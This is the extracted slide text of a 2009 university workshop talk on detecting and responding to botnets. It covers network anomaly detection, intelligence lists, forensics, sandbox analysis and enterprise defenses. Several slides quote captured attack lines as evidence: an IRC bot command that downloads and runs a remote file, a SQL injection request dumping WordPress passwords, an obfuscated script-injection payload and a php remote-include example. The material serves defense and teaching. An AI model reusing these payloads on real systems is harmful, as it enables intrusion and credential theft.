Botnet Phd (Piled Higher and Botnet Phd (Piled Higher and Deeper) Deeper) Craig A Schiller, CISSP-ISSMP,ISSAP Chief Information Security Officer Portland State University A Presentation About Botnet Detection For NWACC 09 Security Workshop by
Dec 25, 2015
Botnet Phd (Piled Higher and Deeper)Botnet Phd (Piled Higher and Deeper)
Craig A Schiller, CISSP-ISSMP,ISSAP
Chief Information Security Officer
Portland State University
A Presentation About
Botnet DetectionFor
NWACC 09Security Workshop
by
© 2009 Craig A Schiller 2
AgendaAgenda
IntroductionDetectionForensics/Intel GatheringMalware AnalysisIncident ResponsePrevention
© 2009 Craig A Schiller 3
Primary SourcePrimary Source
© 2009 Craig A Schiller 4
© 2009 Craig A Schiller 5
AgendaAgenda
IntroductionDetectionForensics/Intel GatheringMalware AnalysisIncident ResponsePrevention
© 2009 Craig A Schiller 6
How Do We Detect How Do We Detect Them?Them? Computer is
ExploitedBecomes a Bot
New Bot Rallys to let Botherder
know it’s joined the team
Retrieve the Anti A/V module
Secure the New Bot Client
Retrieve the Payload module
Listen to the C&C Server/Peer for
commands
Execute the commands
Report Result to the C&C Channel
On Command, Erase all evidence and abandon the
client
A/V Detection
Other Bot Clients
C & C
Download server
C & C
Download serverC & C
Possible traffic to victim
User Browsing Malicious Sites
© 2009 Craig A Schiller 7
How Do We Detect How Do We Detect Them?Them? Computer is
ExploitedBecomes a Bot
New Bot Rallys to let Botherder
know it’s joined the team
Retrieve the Anti A/V module
Secure the New Bot Client
Retrieve the Payload module
Listen to the C&C Server/Peer for
commands
Execute the commands
Report Result to the C&C Channel
On Command, Erase all evidence and abandon the
client
A/V Detection
Other Bot Clients
C & C
Download server
C & C
Download serverC & C
Possible traffic to victim
User Browsing Malicious Sites
Known MalwareDistribution sites
Known C&C sites
Security & FW logs
Abuse@ notices
User Complaint
Anomalous Protocol Detection
Botlike TrafficBad Behavior
Talking to Darknet
© 2009 Craig A Schiller 8
I checked and I didn’t see anything
How Do We Detect How Do We Detect Them?Them?
A/V, Anti-Spam, Anti-SpywareHost basedEnterprise Reporting
User Help Desk TicketsAbuse notificationsQuasi-Intelligence OrganizationsMonitoring & Analysis
OurmonFirewall & Router logsIDS/IPS – Host and NetworkDNSServer & Workstation Log analysisMalware analysisForensics
© 2009 Craig A Schiller 9
OurmonOurmon
Free network security monitoring tool, with Botnet detection capabilities
http://ourmon.cat.pdx.edu/ourmon/index.html
© 2009 Craig A Schiller 10
Network Anomaly DetectionNetwork Anomaly Detection
Is it scanning? Is it participating in an IRC channel? Is there a high controls to data ratio? Is the IRC server/port listed as a known
Command & Control server? Does the IRC traffic text look botlike? Did the host lookup or attempt to
communicate with a known C&C server?
Did the host attempt to communicate with an IP address in the Darknet?
© 2009 Craig A Schiller 11
Network Anomaly DetectionNetwork Anomaly Detection
TCP workweight = syns sent + fins sent + resets returned/total TCP packets
ww =
measure of signal/noise (control/data) high number means all control (syn
scanner) basically means: an IP is scanning
Syn+Fin+Reset Total TCP
© 2009 Craig A Schiller 12
Network Anomaly DetectionNetwork Anomaly Detection
Ourmon does a similar calculation with IRC traffic
measure of signal/noise (control/data) high number means non-human
communication basically means: a bot or an
application (game)
© 2009 Craig A Schiller 13
Recent large ddos attackRecent large ddos attack
fundamental pkts graph looks like this normally:
© 2009 Craig A Schiller 14
Ouch, ouch, ouch! Ouch, ouch, ouch!
that’s 869k pps – we have physical gE connection to Inet …
© 2009 Craig A Schiller 15
““Botlike” IRC text Botlike” IRC text
IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, channel=priv8 clen=5: p=[:[email protected] PRIVMSG #priv8 :fmj curl -o mdbn.gif http://www.warriorbride.ca/mdbn.gif;perl mdbn.gif;rm -f *.gif*]
© 2009 Craig A Schiller 16
““Normal” IRC text Normal” IRC text
IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, channel=priv8 clen=5: p=[:[email protected] PRIVMSG #priv8 : OMG, you’re just my BFF Jill! I once had a BFF that was nowhere as good a BFF as you. <and other meaningless babble> ]
© 2009 Craig A Schiller 17
Snort signatures Snort signatures
No general purpose intrusion detection.
Limited set of Bot related signatures
© 2009 Craig A Schiller 18
Incident Detection examplesIncident Detection examples
1. today, Mcafee, 131.252.242.243, pri=hi, JS/Wonka [**] [1:3111116:1] Mcafee http feed: :http://bluebookcarpices.com/ <http://pices.com/> (JS/Wonka) [**][Classification: access to a potentially vulnerable web application] [Priority: 2]05/21-08:13:56.950979 131.252.242.243:52733 -> 216.240.128.250:80 TCP TTL:63 TOS:0x0 ID:38398 IpLen:20 DgmLen:568 DF***AP*** Seq: 0xD222814A Ack: 0x278524DD Win: 0xFFFF TcpLen: 32 TCP Options (3) => NOP NOP TS: 345145726 2079777105
2. today, zlob, 131.252.243.80, pri=hi[**] [1:666666:1] zlob dns request [**][Classification: Potentially Bad Traffic] [Priority: 2]05/21-09:50:22.532193 131.252.243.80:49190 -> 85.255.115.29:53 UDP TTL:63 TOS:0x0 ID:3755 IpLen:20 DgmLen:73Len: 45
© 2009 Craig A Schiller 19
REN-ISACShadowserverNanogAPWG
Quasi-Intelligence Organizations
Mailing lists• Botnet• http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
• Phishing• http://www.whitestar.linuxbox.org/mailman/listinfo/
phishing
• Vendor
ISC Storm Center
http://www.emergingthreats.net/http://www.malwaredomainlist.com
© 2009 Craig A Schiller 20
Quasi-Intelligence Organizations
© 2009 Craig A Schiller 21
Lists of Known C&C servers
http://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork#toc1http://www.shadowserver.org/wiki/pmwiki.php/Services/Botnet-CCIP
IP Address Port Channel Country Region State Domain ASN AS Name AS Description
81.211.7.122 69.18.206.194 3267 #B#t[r2]N#t
RU US
MOSCOW | COMMACK
MOSKVANEW YORK
GLDN.NET INVISION.COM
3216 12251
SOVAM INVISION
AS Golden Telecom, Moscow, Russia Invision.com, Inc.
81.211.7.122 69.18.206.194 3267 #B#tN#t[r3]
RU US
MOSCOW | COMMACK
MOSKVA NEW YORK
GLDN.NET INVISION.COM
3216 12251
SOVAM INVISION
AS Golden Telecom, Moscow, Russia Invision.com, Inc.
81.211.7.122 69.18.206.194 3267 #B�t[r2]N�t
RU US
MOSCOW | COMMACK
MOSKVANEW YORK
GLDN.NET INVISION.COM
321612251
SOVAM INVISION
AS Golden Telecom, Moscow, Russia |Invision.com, Inc.
81.211.7.122 69.18.206.194 3267 #B.tN.t[r3]
RU US
MOSCOW | COMMACK
MOSKVA NEW YORK
GLDN.NET INVISION.COM
3216 12251
SOVAM INVISION
AS Golden Telecom, Moscow, Russia |Invision.com, Inc.
213.234.193.74 85.21.82.55 6667 #secured
RU RU
MOSCOW | MOSCOW
MOSKVA MOSKVA NET.RU -
39442 8402
UNICO CORBINA
AS JSC UNICO AS Corbina Telecom
Shadow Server Sample
© 2009 Craig A Schiller 22
Quasi-Intelligence Organizations
Supported by Indiana University and through relationship with EDUCAUSE and Internet2, the REN-ISAC is an integral part of higher education’s strategy to improve network security through information collection, analysis and dissemination, early warning, and response -- specifically designed to support the unique environment and needs of organizations connected to served higher education and research networks; and supports efforts to protect the national cyber infrastructure by participating in the formal U.S. ISAC structure.
The REN-ISAC receives, analyzes and acts on operational, threat, warning and actual attack information derived from network instrumentation and information sharing relationships. Instrumentation data include netflow, router ACL counters, darknet monitoring, and Global Network Operations Center operational monitoring systems. Information sharing relationships are established with other ISACs, DHS/US-CERT, private network security collaborations, network and security engineers on national R&E network backbones, and the REN-ISAC members.
REN-ISAC
© 2009 Craig A Schiller 23
Spamhaus Drop List
The Spamhaus Don't Route Or Peer List
DROP (Don't Route Or Peer) is an advisory "drop all traffic" list, consisting of stolen 'zombie' netblocks and netblocks controlled entirely by professional spammers. DROP is a tiny sub-set of the SBL designed for use by firewalls and routing equipment.
DROP is currently available as a simple text list, but will also be available shortly as BGP with routes of listed IPs announced via an AS# allowing networks to then null those routes as being IPs that they do not wish to route traffic for.
The DROP list will NEVER include any IP space "owned" by any legitimate network and reassigned - even if reassigned to the "spammers from hell". It will ONLY include IP space totally controlled by spammers or 100% spam hosting operations. These are "direct allocations" from ARIN, RIPE, APNIC, LACNIC, and others to known spammers, and the troubling run of "hijacked zombie" IP blocks that have been snatched away from their original owners (which in most cases are long dead corporations) and are now controlled by spammers or netblock thieves who resell the space to spammers.
When implemented at a network or ISP's 'core routers', DROP will protect all the network's users from spamming, scanning, harvesting and dDoS attacks originating on rogue netblocks.
Spamhaus strongly encourages the use of DROP by tier-1s and backbones. See the DROP FAQ for information on use and implementation.
© 2009 Craig A Schiller 24
Spamhaus Drop List excerpt 9/17/09UkrTeleGroup
Nevacon
Sonic Colo-HK
Beijing HuaXingGuangWang
InfoVision Data Hosting Service
InfoVision Data Hosting Service
InfoMove Limited HK
InfoVision Data Hosting Service
85.255.112.0/20 SBL36702
194.146.204.0/22 SBL51152
110.44.0.0/20 SBL74731
116.199.128.0/19 SBL56563
117.103.40.0/21 SBL75246
119.27.128.0/19 SBL75245
119.42.144.0/21 SBL70035
120.143.128.0/21 SBL67396
121.46.64.0/18 SBL72673
128.199.0.0/16 SBL62478
132.232.0.0/16 SBL9176
132.240.0.0/16 SBL68517
134.33.0.0/16 SBL7097
138.252.0.0/16 SBL9702
138.43.0.0/16 SBL69354
139.167.0.0/16 SBL64740
143.49.0.0/16 SBL7182
150.230.0.0/16 SBL78129
152.147.0.0/16 SBL8847
167.28.0.0/16 SBL75680
167.97.0.0/16 SBL12947
168.151.0.0/16 SBL73292
© 2009 Craig A Schiller 25
Malware Domain List
© 2009 Craig A Schiller 26
I checked and I didn’t see anything
DNS for Botnet DetectionDNS for Botnet Detection
© 2009 Craig A Schiller 27
I checked and I didn’t see anything
DNS for Botnet DetectionDNS for Botnet Detection
http://www.enyo.de/fw/software/dnslogger/
http://www.enyo.de/fw/software/dnslogger/whois.html
DB of all lookups for Known C&CKnown Malicious SWDistros
© 2009 Craig A Schiller 28
knujon
10 Most Offensive Registrars
XIN NET (Second Time at #1) eNom
Network Solutions Register.com
PLANETONLINE RegTime
OnlineNIC SpotDomains (domainsite)
Wild West HICHINA Web Solutions
© 2009 Craig A Schiller 29
Search Engine Spam & Clicks 4 HireSearch Engine Spam & Clicks 4 Hire
site:yoursite.com -pdf -ppt -doc phentermine OR viagra OR cialis OR vioxx OR oxycontin OR levitra OR ambien OR xanax OR paxil OR "slot-machine" OR "texas-holdem"
Use Google to search for Clicks-4-Hire relays and search engine spam
© 2009 Craig A Schiller 30
Google site search resultsGoogle site search results
© 2009 Craig A Schiller 31
An owned webpageAn owned webpage
© 2009 Craig A Schiller 32
Browser Intelligence gatheringBrowser Intelligence gathering
© 2009 Craig A Schiller 33
Links to this web pageLinks to this web page
© 2009 Craig A Schiller 34
Man in the Browser Attack - Man in the Browser Attack - torpigtorpig
© 2009 Craig A Schiller 35
AgendaAgenda
IntroductionDetectionForensics/Intel GatheringMalware AnalysisIncident ResponsePrevention
© 2009 Craig A Schiller 36
Forensics/Intel GatheringForensics/Intel Gathering
• Quick Forensics• Log Analysis• Process Explorer• TCPView• AutoRuns• Process Monitor
• Rpier – First Responder Tool• Automated Forensics• Consistent information gathered regardless of who runs it
• Sleuthing • How did they get in?• What does it do?• What files are used?• When did what happen?
• Malware Analysis
• More Sleuthing
© 2009 Craig A Schiller 37
I checked and I didn’t see anything
Log analysisLog analysis
© 2009 Craig A Schiller 38
Forensics/Intel Gathering exampleForensics/Intel Gathering example
Process PID CPU Description Company NameSystem Idle Process 0 93.36 Interrupts n/a 1.56 Hardware Interrupts DPCs n/a Deferred Procedure Calls System 4 0.39 smss.exe 508 Windows NT Session Manager Microsoft Corporation csrss.exe 620 Client Server Runtime Process Microsoft Corporation winlogon.exe 884 Windows NT Logon Application Microsoft Corporation services.exe 944 Services and Controller app Microsoft Corporation svchost.exe 1180 Generic Host Process for Win32 Services Microsoft Corporation wmiprvse.exe 3400 WMI Microsoft Corporation svchost.exe 1252 Generic Host Process for Win32 Services Microsoft Corporation svchost.exe 1312 Generic Host Process for PSXSS.EXE 896
Interix Subsystem Server Microsoft Corporationinit 2156 Interix Utility Microsoft Corporationinetd 2432 Interix Utility Microsoft Corporationiexplorer.exe 3560explorer.exe 8564 Windows Explorer Microsoft Corporation ccApp.exe 9208 Symantec User Session Symantec Corporation VPTray.exe 8636 Symantec AntiVirus Symantec Corporation VPC32.exe 9524 Symantec AntiVirus Symantec Corporation iexplorer.exe 6712 sqlmangr.exe 9904 SQL Server Service Manager Microsoft Corporation
© 2009 Craig A Schiller 39
Forensics/Intel Gathering exampleForensics/Intel Gathering example
© 2009 Craig A Schiller 40
Forensics/Intel Gathering exampleForensics/Intel Gathering example
© 2009 Craig A Schiller 41
Forensics/Intel Gathering exampleForensics/Intel Gathering example
Strings in the file iexplorer.exe
Strings in memory
© 2009 Craig A Schiller 42
Centralized LoggingCentralized Logging
NTSyslog
``
``
MySQLDataBase
Server
Internet Log Collection
Log Collection Analysis
© 2009 Craig A Schiller 43
Workstation Log AnalysisWorkstation Log Analysis
http://www.microsoft.com/downloads/details.aspx?FamilyID=890cd06b-abf8-4c25-91b2-f8d975cf8c07&displaylang=en
Log Parser
© 2009 Craig A Schiller 44
A/V Centralized Reporting
Blocked by port blocking rule
3/25/2008 12:56:26 PM C:\Program Files\DNA\btdna.exe Prevent IRC communication 202.57.184.145:6666
3/25/2008 6:26:40 PM C:\Program Files\DNA\btdna.exe Prevent IRC communication 83.252.58.149:6666
3/25/2008 8:55:30 PM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/25/2008 11:24:38 PM C:\Program Files\DNA\btdna.exe Prevent IRC communication 80.222.68.139:6667
3/26/2008 3:37:41 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/26/2008 5:07:33 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/26/2008 7:23:09 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 80.222.68.139:6667
3/26/2008 7:38:59 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/26/2008 7:54:09 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 80.222.68.139:6667
3/26/2008 10:40:04 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/26/2008 10:54:53 AM C:\Program Files\DNA\btdna.exe Prevent mass mailing worms from sending mail 41.220.121.130:25
Use (examine) the central reporting feature of your antivirus server.
© 2009 Craig A Schiller 45
A/V Centralized Reporting
5/9/2008 4:53:34 PM Would be blocked by Access Protection rule (rule is currently not enforced) PSU\anyman C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\anyman\Local Settings\Temporary Internet Files\Content.IE5\BDX492TE\ MediaTubeCodec_ver1.556.0[1].exe
Common Standard Protection: Prevent common programs from running files from the Temp folder Action blocked : Execute
MediaTubeCodec is a fake codec that installs malware and tells you that your computer is infected so you will download a fake antivirus product.
This appeared in the logs before McAfee could detect this malware
© 2009 Craig A Schiller 46
A/V Centralized Reporting
User defined detection: SPYWARE (Potentially Unwanted Program)5/12/2008 9:01:50 AM No Action Taken (Delete failed) SYSTEM McShield.exeC:\Documents and Settings\anyman\Desktop\ctfmona.exe
5/12/2008 9:02:31 AM User defined detection : No Action Taken (Clean failed because the detection isn't cleanable) SYSTEM McShield.exeC:\Documents and Settings\anyman\Desktop\ctfmona.exe
What does quarantine or “No Action Taken” mean?
© 2009 Craig A Schiller 47
Detectable BehaviorDetectable Behavior
• Multi-homed DNS– FQDN maps to 3 or more IP addressesbotnet1.example.com pointing to 127.0.0.1botnet1.example.com pointing to 127.0.0.2botnet1.example.com pointing to 127.0.0.3botnet1.example.com pointing to 127.0.0.4botnet1.example.com pointing to 127.0.0.5botnet1.example.com pointing to 127.0.0.6
• Dynamic DNS used thru commercial site– Change IP addresses quickly
• Short DNS TTLs for clients– Remap DNS often, check at boot
• FastFlux DNS – Change IP addresses and/or DNS names quickly (for
spam < 5 minutes) and often
© 2009 Craig A Schiller 48
Hiding the C&C Server or Phishing WebsiteHiding the C&C Server or Phishing Website
The above animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.
© 2009 Craig A Schiller 49
Passive DNSPassive DNS
http://cert.uni-stuttgart.de/stats/dns-replication.php?query=differbe.hk&submit=Query
https://dnsparse.insec.auckland.ac.nz/dns/index.html
© 2009 Craig A Schiller 50
Fast Flux DNS exampleFast Flux DNS example
© 2009 Craig A Schiller 51
Internal Intelligence gatheringInternal Intelligence gathering
http://code.google.com/p/rapier/
Rapier
A First Responder Toolkit Developed by Steve Mancini, Intel
© 2009 Craig A Schiller 52
Rapier
© 2009 Craig A Schiller 53
Cymru is happy to announce the availability of various service options dedicated to mapping suspected malware hashes to our insight about positively identified malware. Now you can check if a particular piece of code is malware by querying against the extensive Team Cymru Malware Hash Registry.
Malware Hash RegistryMalware Hash Registry
http://www.team-cymru.org/Services/MHR/
$ whois -h hash.cymru.com e1112134b6dcc8bed54e0e34d8ac272795e73d74 RESPONSEe1112134b6dcc8bed54e0e34d8ac272795e73d74 1221154281 53
$ dig +short 733a48a9cb49651d72fe824ca91e8d00.malware.hash.cymru.com TXT RESPONSE"1221154281 53"
Using DNS (dig)
Using whois Unix Time -seconds since midnight 1970-01-01
% A/V Package Detection Rate
© 2009 Craig A Schiller 54
I checked and I didn’t see anything
Alternate C&C MethodsAlternate C&C MethodsEcho-Based BotnetsEcho-based means the bot would simply announce its existence to the C&C.There are several ways of doing this with different volumes of data relayed.
•Connect & forget•File data•URL data
Command-Based Botnets• Web GUI based
•Push rather than pull•P2P•IM•Social Networking (My Space profiles)•Remote Administration Tools
•Dameware•CarbonCopy•Terminal Services•PC Anywhere•RDP
•Drop zone – ftp is the leading protocol here•ftp – phishing C&C - regularly reports back (echoes) to an FTP C&C,
© 2009 Craig A Schiller 55
Incident ResponseIncident Response
Required by OUS Information Security policy
PSU Information Security policy requires an Incident Response plan
PSU has several means of discovering incidents
© 2009 Craig A Schiller 56
AgendaAgenda
IntroductionDetectionForensics/Intel GatheringMalware AnalysisIncident ResponsePrevention
© 2009 Craig A Schiller 57
Carsten Willem’s CWSandboxCarsten Willem’s CWSandbox
VMWare
XP Pro
Ubuntu
© 2009 Craig A Schiller 58
I checked and I didn’t see anything
Malware analysisMalware analysisCWSandbox
- <scanner name="AntiVir Workstation" application_version="2.1.9-20" signature_file_version="6.37.0.90"> <classification>WORM/Rbot.219136.17</classification> <additional_info /> </scanner>
- <connections_outgoing>- <connection transportprotocol="TCP" remoteaddr=“192.168.209.5" remoteport="13601" protocol="IRC" connectionestablished="1" socket="448">- <irc_data username="|00||-X-||4245" password="bong" nick="|00||-X-||4245"> <channel name="#sym" topic_deleted=":.download http://wooop.mooo.com/buz/120.exe c:\120.exe 1" /> <privmsg_deleted value=":|00||-X-||[email protected] PRIVMSG #sym :_CHAR(0x03)_9-_CHAR(0x03)_1::_CHAR(0x03)_0[_CHAR(0x03)_12 120|MoD_CHAR(0x03)_0 ]_CHAR(0x03)_1::_CHAR(0x03)_9-_CHAR(0x03)_ Downloaded 324.0 KB to c:\120.exe @ 6.9 KB/sec." /> </irc_data> </connection>
© 2009 Craig A Schiller 59
Analyzing the MalwareAnalyzing the Malware
CWSandbox Analysis
© 2009 Craig A Schiller 60
The FutureThe Future
Honeypots
© 2009 Craig A Schiller 61
AgendaAgenda
IntroductionDetectionForensics/Intel GatheringMalware AnalysisIncident ResponsePrevention
© 2009 Craig A Schiller 62
Responding to DetectionResponding to Detection
Botnet SensorsBotnet Sensors
Security Researcher
Internet
Wormwatch mailing list
131.252.x.x NERO says bad
131.252.x.x Acting Bad
131.252.x.x talking to bad
38.100.x.x McAfee says bad
Network Team User Support Server SupportTAGs
Create Tracking Ticket
Block Network access
Identify location
Identify computer or user
Identify computer or user
Retrieve computer
Backup all files
Perform quick forensics
Re-image computer
Identify ServIer or webpage owner
Identify compromised account
Locate malware
Determine attack vector
Security Team
Locate infected system
Identify system owner
Re-image computer
Identify computer or user
Review quick forensics
Perform deep forensics
Ensure appropriate resources are working the incident
Identify useful intelligence markers
McAfeeServer
User Reports
© 2009 Craig A Schiller 63
AgendaAgenda
IntroductionDetectionForensics/Intel GatheringMalware AnalysisIncident ResponsePrevention
© 2009 Craig A Schiller 64
Blocking Organized Crime supportersBlocking Organized Crime supporters
If your ISP doesn't already block them, you can add known criminals to your firewall rules or to your DNS dump tables.
Use the Spamhaus Drop list to block known evil sites
Intercage, Inhoster, and Nevacon:85.255.112.0/20 #SBL36702(85.255.112.0 - 85.255.127.255)69.50.160.0/19(69.50.160.0 - 69.50.191.255)194.146.204.0/22 #SBL51152(194.146.204.0 - 194.146.207.255)
Blog that track the RBN activities
http://rbnexploit.blogspot.com/
© 2009 Craig A Schiller 6565
How do they get into User systems?How do they get into User systems?
Guessing weak passwords/phishing attacksExploiting Network vulnerabilitiesUsing Social EngineeringUsing web-based Trojans
Trojan websites – Game cheatsTrojan websites - Pornography
Using Email-based TrojansPhishing & PharmingTrojan downloads
Using IM-based Trojans (Social engineering)Rogue dhcp server serving malicious DNS server
© 2009 Craig A Schiller 6666
How do they get into Servers? php includesHow do they get into Servers? php includes
Target.com
Webhost.com
1. Get /a.php?vuln=http://webhost.com/evil.php
2. Target makes request to wehost.com/evil.php
3. Malware PHP file ‘evil.php’ is sent to Target.comAnd is executed by the include() function.
4. The Output from evil.php is sent to Attacker
<?php include($vuln); ?>
Attacker
© 2009 Craig A Schiller 6767
How do they get into Servers? – SQL How do they get into Servers? – SQL InjectionInjection
--c295b75d-A--[03/Jun/2008:02:52:08 --0700] ELS-dIP8ehcAACTQmlkAAAAJ 87.118.124.3 45819 192.168.22.155 80--c295b75d-B--GET /shesheet/wordpress/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)Host: www.somwhere-in.pdx.eduConnection: close--c295b75d-H--
© 2009 Craig A Schiller 6868
mod-secmod-sec
Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}?\\bfrom|from\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:cat. [id "950001"] [msg "SQL Injection Attack. Matched signature <union select>"] [severity "CRITICAL"]Stopwatch: 1212486727810932 339469 (2354 3333 -)Producer: ModSecurity v2.1.5 (Apache 2.x)Server: Apache/2.2.8 (OpenPKG/CURRENT)--c295b75d-Z--
© 2009 Craig A Schiller 6969
Obfu73ca74ionObfu73ca74ion
page=-1%20un%69%6fn%20sel%65%63t%201%2c2%2c3%2c4%2c0x3c736372697074207372633d22687474703a2f2f73696d706c652d7464732e696e666f2f5f392e6a73223e3c2f7363726970743e%2c6%2F%2A
-1 union select 1,2,3,4,<script src="http://simple-tds.info/_9.js"></script>,6/*
© 2009 Craig A Schiller 7070
PicturesPictures
phpBB photo galleries that permit users to post their own pictures
Webhost.com
1. Evil user post a executable file with a .gif extension (notapic.gif)
2. Evil user browses to the executable gif
Attacker
3. Webhost executes notapic.gif as web page owner
© 2009 Craig A Schiller 7171
Other meansOther means
Profiles of user accounts (Social Networking sites)
Comment sections that don’t require the user to authenticate
BB’s that permit users to create their own accounts without an administrator
User web pages
Departmental web pages
Traditional network vulnerability attacks
© 2009 Craig A Schiller 72
Protect Your EnterpriseProtect Your Enterprise
AVOIDANCE
1. Establish a perimeter and segregate valuable or dangerous network segments. Make FW rules accountable and require change control
PREVENT
1. Ensure that all enterprise and local accounts have strong passwords. Configure Domain security policy to enforce this and auto-lockout
2. Eliminate all generic accounts. Where possible make all non-user accounts services.
3. Eliminate or encapsulate all unencrypted authentication
4. Establish standards for web app and other development to eliminate avoidable coding vulnerabilities (e.g. use of mod-sec for apache websites)
5. Staff your anti-spam, anti-virus, abuse, proxy cache, and web filter processing efforts
6. Block outbound port 25 traffic except from your official mail servers
7. Block outbound DNS requests except for iterative requests made through the official DNS servers (prevents spray and pray attacks)
© 2009 Craig A Schiller 73
Protect Your EnterpriseProtect Your EnterpriseDETECT
1. Install and operate IDS/IPS systems (snort, etc)
2. Analyze network traffic for heuristic evidence of botlike behavior
3. Google your own site - site:mysite.com viagra site:mysite.com c99
4. Centralize and process logs, including workstation security and firewall logs.
5. Mine your anti-virus quarantines, abuse notifications, infected systems for intelligence about botnet infections. Feed this information to your event correlation system
6. Participate or join quasi-intelligence organizations
MITIGATE
1. Use intelligence data in your DNS server to block access to C&C sites and malware distribution sites.
2. Use your centralized logs to detect and react to password guessing schemes in near-realtime.
3. Report detections to an incident reponse team that will quarantine compromised systems, determine physical location, and direct IT staff to retrieve the system, extract first responder data and intelligence, re-image the system than return it to the system owner along with a report on the successful attack vector.
4. Include known malware distribution sites in your proxy server block lists
5. Establish a spearphishing hotline for quick response.
© 2009 Craig A Schiller 74
Protect Your EnterpriseProtect Your Enterprise
REDUCE THE THREAT
1. Report new threats. Phishing attacks to Anti-Phishing Working Group. Botnet clients/C&C to isotf.org.
2. Feed the Bot related DNS attempts to your event correlation system
3. Add SiteAdvisor or IE7 anti-phishing feature to browsers
REDUCE THE VULNERABILITY
1. Actively scan your site for vulnerabilities (OS, network, web apps, etc)
NON-REALTIME ANALYSIS, DETECTION, and RECOVERY
1. Analyze data collected to identify new intelligence markers.
2. Evaluate new signatures, new tools, etc.
3. Use non-realtime data to develop strategies for ranking confidence related to available data and intelligence.
4. Use Forensic techniques and sandbox technology to gather intelligence from known compromised workstations.
© 2009 Craig A Schiller 75
RBNRBN
© 2009 Craig A Schiller 7676
RBN OperationsRBN Operations
11/21/07 Ref: Bizeul.org -
SPB IX
DELTASYS
DATAPOINT
INFOBOX
RBN
SILVERNETCREDOLINK
OINVEST
© 2009 Craig A Schiller 7777
RBN USA Dead?RBN USA Dead?
It is pleasing to report the last remaining peer routing Atrivo (AS 27595 Atrivo/ Intercage), ‘Pacific Internet Exchange’ (PIE) see Spamhaus ref below, was withdrawn at 2:35am EST Sunday Sept 21st 2008.
© 2009 Craig A Schiller 7878
RBN USA Dead?RBN USA Dead?
© 2009 Craig A Schiller 7979
What Happened?What Happened?
http://www.betanews.com/article/UnitedLayer_COO_Giving_access_to_InterCage_is_an_issue_of_ethics/1222396858
Company after company dropped relations with InterCage in the wake of multiple reports documenting its shady dealings,
Suddenly UnitedLayer was the last firm willing to work with it. That essentially gave Donaldson's people the power to send InterCage dark or, as he chose to do, stick InterCage in a sandbox.
By Angela Gunn, BetaNews September 25, 2008, 10:40 PM
© 2009 Craig A Schiller 8080
McColoMcColo
It is pleasing to report the last remaining peer routing Atrivo (AS 27595 Atrivo/ Intercage), ‘Pacific Internet Exchange’ (PIE) see Spamhaus ref below, was withdrawn at 2:35am EST Sunday Sept 21st 2008.
© 2009 Craig A Schiller 8181
Effect of De-peeringEffect of De-peering
50% Drop in Spam
© 2009 Craig A Schiller 8282
Who’s Next?Who’s Next?In the wake of the demise of Atrivo/Intercage and McColo, attention has focused on other badware nets these entities formerly hosted.
EstDomains, Esthost, Hostfresh, Cernel,
EstDomains was an Estonian network, led by Vladimir Tsastsin, that allegedly once acted as the IP registrar for RBN domains. Malicious Web site hosting nasties like CoolWebSearch and other spyware programs trace back to EstDomains. Tsastsin has links to organized crime and also heads up Rove Digital, a site also suspected of hosting malware servers.
Anti-spam group Spamhaus called EstDomain, Esthost, Cernel, and Hostfresh, the "tentacles" of Atrivo/Intercage. Spamhaus cited these networks in August 2008 as backed by "gangs of cybercriminals" whose disappearance from the Web would be difficult to achieve, but would result in a safer Internet.
© 2009 Craig A Schiller 8383
AgendaAgenda
•Botnet Overview•Botnet Schemes•How Do They Get In?•What Can We Do?•Concluding Thoughts
© 2009 Craig A Schiller 8484
Source of all evilSource of all evil
© 2009 Craig A Schiller 85
Q&AQ&A
Questions?
Craig A Schiller, CISSP-ISSMP, [email protected]
Portland State UniversityCISO